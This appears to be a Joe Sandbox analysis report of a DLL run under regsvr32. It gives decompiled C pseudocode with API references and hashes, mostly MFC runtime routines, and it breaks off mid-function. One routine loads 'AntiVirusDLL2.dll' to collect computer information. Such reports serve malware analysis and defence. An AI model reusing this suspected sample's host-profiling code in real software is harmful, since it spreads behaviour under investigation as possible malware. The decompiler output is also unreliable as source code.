                                                                                                                0x10011dc1
                                                                                                                0x10011dc1
                                                                                                                0x00000000
                                                                                                                0x10011db7
                                                                                                                0x00000000
                                                                                                                0x10011d4a
                                                                                                                0x10011cdd
                                                                                                                0x10011ce5
                                                                                                                0x10011ce7
                                                                                                                0x10011ce9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10011ceb
                                                                                                                0x10011cf0
                                                                                                                0x10011cf5
                                                                                                                0x10011d0b
                                                                                                                0x10011d1d
                                                                                                                0x10011d2d
                                                                                                                0x10011d31
                                                                                                                0x10011d37
                                                                                                                0x10011d3b
                                                                                                                0x10011d40
                                                                                                                0x10011d46
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10011d46
                                                                                                                0x00000000
                                                                                                                0x10011ce5

                                                                                                                APIs
                                                                                                                • SendMessageA.USER32 ref: 10011C4B
                                                                                                                  • Part of subcall function 100119E0: GetClientRect.USER32 ref: 10011A01
                                                                                                                  • Part of subcall function 10026562: SendMessageA.USER32 ref: 100265A4
                                                                                                                • SendMessageA.USER32 ref: 10011CCE
                                                                                                                • SendMessageA.USER32 ref: 10011D31
                                                                                                                • SendMessageA.USER32 ref: 10011D99
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ClientRect
                                                                                                                • String ID: F
                                                                                                                • API String ID: 1925248871-1304234792
                                                                                                                • Opcode ID: 5cb2d2996ae3434bbea0c72a42839cc5b4d5cb078a5cab3b0e9bb9ff3c620ca5
                                                                                                                • Instruction ID: 568477cb1e40003779f35a6a40b397248b4cfca5fcb394985c4b3b7345751374
                                                                                                                • Opcode Fuzzy Hash: 5cb2d2996ae3434bbea0c72a42839cc5b4d5cb078a5cab3b0e9bb9ff3c620ca5
                                                                                                                • Instruction Fuzzy Hash: 32515571204701ABD318CB28CC81F9BBBE9FF897A4F000A1DF5499B291DB71E944CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __localtime64_s
                                                                                                                • String ID: %d:%d:%d
                                                                                                                • API String ID: 773316593-941173414
                                                                                                                • Opcode ID: 80b10172bbff392484409e4a6da1d6d51d0a31f379ca35abf7c82bb4f9f553e0
                                                                                                                • Instruction ID: 38e57b7cdc0de5d0741937d4f70076225911ce1920d44c3b36a1ef4624a2621f
                                                                                                                • Opcode Fuzzy Hash: 80b10172bbff392484409e4a6da1d6d51d0a31f379ca35abf7c82bb4f9f553e0
                                                                                                                • Instruction Fuzzy Hash: 80519D312446409BD324CB248C52F9BB3E5EF89725F144A1CE9999F2D2E772E908CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E100351D3(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				short _v72;
                                                                                                                				char* _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int* _v84;
                                                                                                                				signed int _v88;
                                                                                                                				intOrPtr _v92;
                                                                                                                				void* __edi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t54;
                                                                                                                				void* _t66;
                                                                                                                				short* _t70;
                                                                                                                				signed int _t72;
                                                                                                                				signed int _t81;
                                                                                                                				signed int* _t83;
                                                                                                                				short* _t84;
                                                                                                                				void* _t91;
                                                                                                                				signed int* _t98;
                                                                                                                				signed int _t99;
                                                                                                                				void** _t100;
                                                                                                                				intOrPtr _t102;
                                                                                                                				signed int _t104;
                                                                                                                				signed int _t106;
                                                                                                                				void* _t107;
                                                                                                                
                                                                                                                				_t101 = __esi;
                                                                                                                				_t97 = __edx;
                                                                                                                				_t82 = __ebx;
                                                                                                                				_t54 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v8 = _t54 ^ _t106;
                                                                                                                				_t100 = __ecx;
                                                                                                                				_v76 = _a4;
                                                                                                                				if(__ecx[1] != 0) {
                                                                                                                					_push(__ebx);
                                                                                                                					_push(__esi);
                                                                                                                					_t83 = GlobalLock( *__ecx);
                                                                                                                					_v84 = _t83;
                                                                                                                					_v88 = 0 | _t83[0] == 0x0000ffff;
                                                                                                                					_v80 = E10035035(_t83);
                                                                                                                					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
                                                                                                                					_v92 = _t102;
                                                                                                                					if(_v88 == 0) {
                                                                                                                						 *_t83 =  *_t83 | 0x00000040;
                                                                                                                					} else {
                                                                                                                						_t83[3] = _t83[3] | 0x00000040;
                                                                                                                					}
                                                                                                                					if(lstrlenA(_v76) >= 0x20) {
                                                                                                                						L15:
                                                                                                                						_t66 = 0;
                                                                                                                					} else {
                                                                                                                						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
                                                                                                                						_v76 = _t97;
                                                                                                                						if(_t97 < _t102) {
                                                                                                                							goto L15;
                                                                                                                						} else {
                                                                                                                							_t70 = E10035060(_t83);
                                                                                                                							_t91 = 0;
                                                                                                                							_t84 = _t70;
                                                                                                                							if(_v80 != 0) {
                                                                                                                								_t81 = E1003D1D0(_t84 + _t102);
                                                                                                                								_t97 = _v76;
                                                                                                                								_t91 = _t102 + 2 + _t81 * 2;
                                                                                                                							}
                                                                                                                							_t33 = _t97 + 3; // 0x3
                                                                                                                							_t98 = _v84;
                                                                                                                							_t36 = _t84 + 3; // 0x10002
                                                                                                                							_t72 = _t91 + _t36 & 0xfffffffc;
                                                                                                                							_t104 = _t84 + _t33 & 0xfffffffc;
                                                                                                                							_v80 = _t72;
                                                                                                                							if(_v88 == 0) {
                                                                                                                								_t99 =  *(_t98 + 8) & 0x0000ffff;
                                                                                                                							} else {
                                                                                                                								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
                                                                                                                							}
                                                                                                                							if(_v76 == _t91 || _t99 <= 0) {
                                                                                                                								L17:
                                                                                                                								 *_t84 = _a8;
                                                                                                                								_t97 =  &_v72;
                                                                                                                								E1000B190(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
                                                                                                                								_t100[1] = _t100[1] + _t104 - _v80;
                                                                                                                								GlobalUnlock( *_t100);
                                                                                                                								_t100[2] = _t100[2] & 0x00000000;
                                                                                                                								_t66 = 1;
                                                                                                                							} else {
                                                                                                                								_t97 = _t100[1];
                                                                                                                								_t95 = _t97 - _t72 + _v84;
                                                                                                                								if(_t97 - _t72 + _v84 <= _t97) {
                                                                                                                									E1000B190(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
                                                                                                                									_t107 = _t107 + 0x10;
                                                                                                                									goto L17;
                                                                                                                								} else {
                                                                                                                									goto L15;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_pop(_t101);
                                                                                                                					_pop(_t82);
                                                                                                                				} else {
                                                                                                                					_t66 = 0;
                                                                                                                				}
                                                                                                                				return E1003B437(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
                                                                                                                			}




























                                                                                                                APIs
                                                                                                                • GlobalLock.KERNEL32 ref: 100351FD
                                                                                                                • lstrlenA.KERNEL32(?,?,00000000), ref: 10035245
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020,?,00000000), ref: 1003525F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                • String ID: @
                                                                                                                • API String ID: 1529587224-2766056989
                                                                                                                • Opcode ID: 49f461298e0e4ba3214956fe4e7bcdc5e4cfc2ed037265dc52bd360cf4ee4902
                                                                                                                • Instruction ID: 480a5723c4f33fc57dea96c9df4a7e33eb7f386d0a1c258711ad15b4c868c559
                                                                                                                • Opcode Fuzzy Hash: 49f461298e0e4ba3214956fe4e7bcdc5e4cfc2ed037265dc52bd360cf4ee4902
                                                                                                                • Instruction Fuzzy Hash: 79411271900219DFDB05DFE4CC85A9EBBB5FF04352F20822AE411EF2A5E775A945CB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E1001E4B4(void* __ebx, intOrPtr __ecx, void* __edi, CHAR* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t33;
                                                                                                                				struct HINSTANCE__* _t44;
                                                                                                                				signed int _t45;
                                                                                                                				_Unknown_base(*)()* _t47;
                                                                                                                				intOrPtr _t54;
                                                                                                                				intOrPtr _t59;
                                                                                                                				void* _t77;
                                                                                                                
                                                                                                                				_t76 = __esi;
                                                                                                                				_t75 = __edi;
                                                                                                                				_push(0x20);
                                                                                                                				E1003D24F(E100531FE, __ebx, __edi, __esi);
                                                                                                                				_t59 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t77 - 0x2c)) = __ecx;
                                                                                                                				 *((intOrPtr*)(__ecx)) = 0x1005ad94;
                                                                                                                				_t33 =  *((intOrPtr*)(__ecx + 0x44));
                                                                                                                				 *(_t77 - 4) = 2;
                                                                                                                				 *((intOrPtr*)(_t77 - 0x24)) = _t33;
                                                                                                                				if(_t33 == 0) {
                                                                                                                					L7:
                                                                                                                					if( *((intOrPtr*)(_t59 + 0x4c)) == 0) {
                                                                                                                						L12:
                                                                                                                						E1002DA4D(_t59, _t59 + 0x24, _t75);
                                                                                                                						E1002C404(_t59 + 0x64);
                                                                                                                						 *(_t77 - 0x20) =  *(_t77 - 0x20) & 0x00000000;
                                                                                                                						_push(_t77 - 0x20);
                                                                                                                						if(E1002C5B4(_t59, 0x1005f994) >= 0) {
                                                                                                                							_t76 = "mfcm80.dll";
                                                                                                                							_t75 = _t77 - 0x1c;
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsw");
                                                                                                                							asm("movsb");
                                                                                                                							_t44 = GetModuleHandleA(_t77 - 0x1c);
                                                                                                                							if(_t44 != 0) {
                                                                                                                								_t47 = GetProcAddress(_t44, "MFCM80ReleaseManagedReferences");
                                                                                                                								if(_t47 != 0) {
                                                                                                                									 *_t47( *(_t77 - 0x20));
                                                                                                                								}
                                                                                                                							}
                                                                                                                							_t45 =  *(_t77 - 0x20);
                                                                                                                							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                						}
                                                                                                                						 *(_t77 - 4) = 1;
                                                                                                                						E1002E1CB(_t59 + 0x40);
                                                                                                                						 *(_t77 - 4) = 0;
                                                                                                                						E1002DC22(_t59, _t59 + 0x24, _t75);
                                                                                                                						 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
                                                                                                                						E1001CE74(_t59);
                                                                                                                						return E1003D2D2(_t59, _t75, _t76);
                                                                                                                					}
                                                                                                                					_t75 = _t59 + 0x40;
                                                                                                                					do {
                                                                                                                						_t76 = E1002E112(_t59, _t75, _t75, _t76);
                                                                                                                						_t85 = _t76;
                                                                                                                						if(_t76 != 0) {
                                                                                                                							E1001DC2C(_t76);
                                                                                                                							_push(_t76);
                                                                                                                							E100160E7(_t59, _t75, _t76, _t85);
                                                                                                                						}
                                                                                                                					} while ( *((intOrPtr*)(_t59 + 0x4c)) != 0);
                                                                                                                					goto L12;
                                                                                                                				} else {
                                                                                                                					_t75 = __ecx + 0x40;
                                                                                                                					do {
                                                                                                                						 *((intOrPtr*)(_t77 - 0x28)) = _t33;
                                                                                                                						_t76 =  *((intOrPtr*)(E100182A6(_t77 - 0x24)));
                                                                                                                						if(_t76 != 0) {
                                                                                                                							_t54 =  *((intOrPtr*)(_t76 + 4));
                                                                                                                							if(_t54 != 0) {
                                                                                                                								_t82 =  *((intOrPtr*)(_t54 + 0x90));
                                                                                                                								if( *((intOrPtr*)(_t54 + 0x90)) == 0) {
                                                                                                                									E1002E143(_t75, _t76,  *((intOrPtr*)(_t77 - 0x28)));
                                                                                                                									E1001DC2C(_t76);
                                                                                                                									_push(_t76);
                                                                                                                									E100160E7(_t59, _t75, _t76, _t82);
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t33 =  *((intOrPtr*)(_t77 - 0x24));
                                                                                                                					} while (_t33 != 0);
                                                                                                                					goto L7;
                                                                                                                				}
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1001E4BB
                                                                                                                • GetModuleHandleA.KERNEL32(?,1005F994,00000000,?), ref: 1001E586
                                                                                                                • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 1001E596
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                • API String ID: 2418878492-2500072749
                                                                                                                • Opcode ID: ca376fa0ef1207964393a979f59780725c108ec9f3920f44291128dbebe2ad6a
                                                                                                                • Instruction ID: 913035a3e460062c6a8b571bffe7378fb7edafbc90b49d1b1ae7eaca53a4f5ad
                                                                                                                • Opcode Fuzzy Hash: ca376fa0ef1207964393a979f59780725c108ec9f3920f44291128dbebe2ad6a
                                                                                                                • Instruction Fuzzy Hash: B8316D74A00655DBCB15EFA0C885BAD77A6EF48344F410469E901AF282EB74EE84CB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E100027E0(void* __ecx, void* __esi, void* __eflags) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				_Unknown_base(*)()* _t10;
                                                                                                                				struct HINSTANCE__* _t41;
                                                                                                                				void* _t59;
                                                                                                                
                                                                                                                				_t59 = __ecx;
                                                                                                                				E10021017(__ecx, __ecx);
                                                                                                                				_t41 = LoadLibraryA("dll//AntiVirusDLL2.dll");
                                                                                                                				_t65 = _t41;
                                                                                                                				if(_t41 != 0) {
                                                                                                                					_t10 = GetProcAddress(_t41, "GetComputerInfo");
                                                                                                                					__eflags = _t10;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						_t61 =  *_t10(__esi);
                                                                                                                						FreeLibrary(_t41);
                                                                                                                						E1001D2C4(E1001D1C2(_t59, 0x408),  *_t11);
                                                                                                                						E1001D2C4(E1001D1C2(_t59, 0x409),  *((intOrPtr*)(_t11 + 0x14)));
                                                                                                                						E1001D2C4(E1001D1C2(_t59, 0x40a),  *((intOrPtr*)(_t61 + 0x10)));
                                                                                                                						E1001D2C4(E1001D1C2(_t59, 0x40b),  *((intOrPtr*)(_t61 + 4)));
                                                                                                                						E1001D2C4(E1001D1C2(_t59, 0x40c),  *((intOrPtr*)(_t61 + 8)));
                                                                                                                						E1001D2C4(E1001D1C2(_t59, 0x40d),  *((intOrPtr*)(_t61 + 0xc)));
                                                                                                                						E1001D2C4(E1001D1C2(_t59, 0x40e),  *((intOrPtr*)(_t61 + 0x18)));
                                                                                                                						E1001D2C4(E1001D1C2(_t59, 0x40f),  *((intOrPtr*)(_t61 + 0x1c)));
                                                                                                                						return 1;
                                                                                                                					} else {
                                                                                                                						E1002181C(_t41, _t59, __esi, __eflags, 0x10056ae0, _t10, _t10);
                                                                                                                						__eflags = 0;
                                                                                                                						return 0;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					E1002181C(_t41, _t59, __esi, _t65, 0x10056b08, _t9, _t9);
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(dll//AntiVirusDLL2.dll), ref: 100027EE
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetComputerInfo), ref: 10002811
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetComputerInfo$dll//AntiVirusDLL2.dll
                                                                                                                • API String ID: 2574300362-350967257
                                                                                                                • Opcode ID: 5c1b4f95d8da9572d4151b00c4a79dde054d989a5c08d6a936d9945051a2455d
                                                                                                                • Instruction ID: 2a93e0a6df5a093b03b8c2167961479cea2b79d08d548067a17943b43938591b
                                                                                                                • Opcode Fuzzy Hash: 5c1b4f95d8da9572d4151b00c4a79dde054d989a5c08d6a936d9945051a2455d
                                                                                                                • Instruction Fuzzy Hash: C82138A97502003BEE14F6B4ACD69BF629AEB94610704482AF756DF2C2DE74FC829711
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E1001D024(void* __edx, signed int _a116, char _a120) {
                                                                                                                				void _v12;
                                                                                                                				char _v16;
                                                                                                                				signed int _v20;
                                                                                                                				int _v24;
                                                                                                                				char _v124;
                                                                                                                				char _v172;
                                                                                                                				intOrPtr _v184;
                                                                                                                				int __ebx;
                                                                                                                				signed int __edi;
                                                                                                                				signed int __esi;
                                                                                                                				signed int __ebp;
                                                                                                                				signed int _t26;
                                                                                                                				unsigned int _t28;
                                                                                                                				intOrPtr _t35;
                                                                                                                				unsigned int _t39;
                                                                                                                				intOrPtr _t40;
                                                                                                                				void* _t42;
                                                                                                                				void* _t43;
                                                                                                                				signed int _t45;
                                                                                                                
                                                                                                                				_t45 =  &_v124;
                                                                                                                				_t26 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_a116 = _t26 ^ _t45;
                                                                                                                				_push(_t43);
                                                                                                                				_push(_t42);
                                                                                                                				_t28 = GetMenuCheckMarkDimensions();
                                                                                                                				_t38 = _t28;
                                                                                                                				_t39 = _t28 >> 0x10;
                                                                                                                				_v24 = _t39;
                                                                                                                				if(_t28 <= 4 || __ecx <= 5) {
                                                                                                                					_push(_t45);
                                                                                                                					_push(_t39);
                                                                                                                					_v172 = 0x1006c938;
                                                                                                                					E1003D2F0( &_v172, 0x1006522c);
                                                                                                                					asm("int3");
                                                                                                                					_push(4);
                                                                                                                					E1003D1E6(E10052A8D, _t38, _t42, _t43);
                                                                                                                					_t40 = E1002D12C(0x104);
                                                                                                                					_v184 = _t40;
                                                                                                                					_t35 = 0;
                                                                                                                					_v172 = 0;
                                                                                                                					if(_t40 != 0) {
                                                                                                                						_t35 = E10022AE3(_t40);
                                                                                                                					}
                                                                                                                					return E1003D2BE(_t35);
                                                                                                                				} else {
                                                                                                                					if(__ebx > 0x20) {
                                                                                                                						__ebx = 0x20;
                                                                                                                					}
                                                                                                                					__eax = __ebx - 4;
                                                                                                                					asm("cdq");
                                                                                                                					__eax = __ebx - 4 - __edx;
                                                                                                                					__esi = __ebx + 0xf;
                                                                                                                					__esi = __ebx + 0xf >> 4;
                                                                                                                					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
                                                                                                                					__esi = __esi << 4;
                                                                                                                					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
                                                                                                                					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
                                                                                                                					if(__edi > 0xc) {
                                                                                                                						__edi = 0xc;
                                                                                                                					}
                                                                                                                					__eax = 0x20;
                                                                                                                					if(__ecx > __eax) {
                                                                                                                						_v24 = __eax;
                                                                                                                					}
                                                                                                                					 &_v12 = E1003BB70(__edi,  &_v12, 0xff, 0x80);
                                                                                                                					_v24 = _v24 + 0xfffffffa;
                                                                                                                					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
                                                                                                                					__ecx = __esi + __esi;
                                                                                                                					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
                                                                                                                					__edx = 0x1005ac1c;
                                                                                                                					_v20 = __esi + __esi;
                                                                                                                					_v16 = 5;
                                                                                                                					do {
                                                                                                                						__si =  *__edx & 0x000000ff;
                                                                                                                						__ecx = __edi;
                                                                                                                						__si = ( *__edx & 0x000000ff) << __cl;
                                                                                                                						__edx =  &(__edx[1]);
                                                                                                                						__ecx = __si & 0x0000ffff;
                                                                                                                						__eax->i = __ch;
                                                                                                                						__eax->i = __cl;
                                                                                                                						__eax = __eax + _v20;
                                                                                                                						_t21 =  &_v16;
                                                                                                                						 *_t21 = _v16 - 1;
                                                                                                                					} while ( *_t21 != 0);
                                                                                                                					__eax =  &_v12;
                                                                                                                					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
                                                                                                                					_pop(__edi);
                                                                                                                					_pop(__esi);
                                                                                                                					 *0x10070cc0 = __eax;
                                                                                                                					_pop(__ebx);
                                                                                                                					if(__eax == 0) {
                                                                                                                						__eax = LoadBitmapA(__eax, 0x7fe3);
                                                                                                                						 *0x10070cc0 = __eax;
                                                                                                                					}
                                                                                                                					__ecx = _a116;
                                                                                                                					__ecx = _a116 ^ __ebp;
                                                                                                                					__eax = E1003B437(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
                                                                                                                					__ebp =  &_a120;
                                                                                                                					__esp =  &_a120;
                                                                                                                					_pop(__ebp);
                                                                                                                					return __eax;
                                                                                                                				}
                                                                                                                			}























                                                                                                                APIs
                                                                                                                • GetMenuCheckMarkDimensions.USER32 ref: 1001D03C
                                                                                                                • _memset.LIBCMT ref: 1001D09E
                                                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 1001D0F0
                                                                                                                • LoadBitmapA.USER32 ref: 1001D108
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4271682439-3916222277
                                                                                                                • Opcode ID: 992e82bce5306714c7f7208ed989e3000c036713dc2ec795b1cd969a9b1bd3e8
                                                                                                                • Instruction ID: 9cb990df8155ee4390ab2b3a55e264f6333e16bccc0bff2fcfcad58d756d3a0f
                                                                                                                • Opcode Fuzzy Hash: 992e82bce5306714c7f7208ed989e3000c036713dc2ec795b1cd969a9b1bd3e8
                                                                                                                • Instruction Fuzzy Hash: 4F310572A002599FEB10DF78CC86BAE7BF5EB48304F15062AE901EB281D630E985CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E1001EC6F(signed int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t49;
                                                                                                                				signed int _t60;
                                                                                                                				signed int _t64;
                                                                                                                				signed int _t67;
                                                                                                                				signed int _t80;
                                                                                                                				signed int _t86;
                                                                                                                				intOrPtr* _t90;
                                                                                                                				void* _t91;
                                                                                                                
                                                                                                                				_t74 = __ebx;
                                                                                                                				_push(0x80);
                                                                                                                				E1003D24F(E10053290, __ebx, __edi, __esi);
                                                                                                                				_t49 =  *((intOrPtr*)(_t91 + 8));
                                                                                                                				_t90 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t91 - 0x50)) = 0;
                                                                                                                				 *((intOrPtr*)(_t91 - 0x54)) = 0x100572d4;
                                                                                                                				 *(_t91 - 4) = 0;
                                                                                                                				if(_t49 == 0 ||  *(_t49 + 4) == 0) {
                                                                                                                					if(E1001E026(_t91 - 0x54, 0x11) != 0 || E1001E026(_t91 - 0x54, 0xd) != 0) {
                                                                                                                						_t49 = _t91 - 0x54;
                                                                                                                						goto L6;
                                                                                                                					} else {
                                                                                                                						 *((intOrPtr*)(_t90 + 0x64)) = 0;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L6:
                                                                                                                					_t11 = _t49 + 4; // 0x10004b40
                                                                                                                					GetObjectA( *_t11, 0x3c, _t91 - 0x4c);
                                                                                                                					_push(_t91 - 0x30);
                                                                                                                					 *(_t91 - 0x78) = 0x20;
                                                                                                                					E100169AB(_t74, _t91 - 0x58, 0, _t90, __eflags);
                                                                                                                					 *((intOrPtr*)(_t91 - 0x74)) =  *((intOrPtr*)(_t91 - 0x58));
                                                                                                                					 *((short*)(_t91 - 0x68)) =  *((intOrPtr*)(_t91 - 0x3c));
                                                                                                                					 *(_t91 - 0x66) =  *(_t91 - 0x35) & 0x000000ff;
                                                                                                                					 *(_t91 - 0x64) =  *(_t91 - 0x38) & 0x000000ff;
                                                                                                                					 *(_t91 - 0x60) =  *(_t91 - 0x37) & 0x000000ff;
                                                                                                                					 *(_t91 - 0x5c) =  *(_t91 - 0x36) & 0x000000ff;
                                                                                                                					_t60 =  *(_t91 - 0x4c);
                                                                                                                					__eflags = _t60;
                                                                                                                					 *(_t91 - 4) = 1;
                                                                                                                					_t74 = _t60;
                                                                                                                					if(__eflags < 0) {
                                                                                                                						_t74 =  ~_t60;
                                                                                                                					}
                                                                                                                					E10024650(_t74, _t91 - 0x8c, 0, _t90, __eflags);
                                                                                                                					 *(_t91 - 4) = 2;
                                                                                                                					_t80 = GetDeviceCaps( *(_t91 - 0x84), 0x5a);
                                                                                                                					_t64 = _t74 * 0xafc80;
                                                                                                                					asm("cdq");
                                                                                                                					_t86 = _t64 % _t80;
                                                                                                                					_t90 = _t90 + 0x64;
                                                                                                                					 *((intOrPtr*)(_t91 - 0x6c)) = 0;
                                                                                                                					 *(_t91 - 0x70) = _t64 / _t80;
                                                                                                                					E1002C404(_t90);
                                                                                                                					_t67 = _t91 - 0x78;
                                                                                                                					__imp__#420(_t67, 0x1005fb14, _t90,  *((intOrPtr*)(_t90 + 0x20)));
                                                                                                                					__eflags = _t67;
                                                                                                                					if(__eflags < 0) {
                                                                                                                						 *_t90 = 0;
                                                                                                                					}
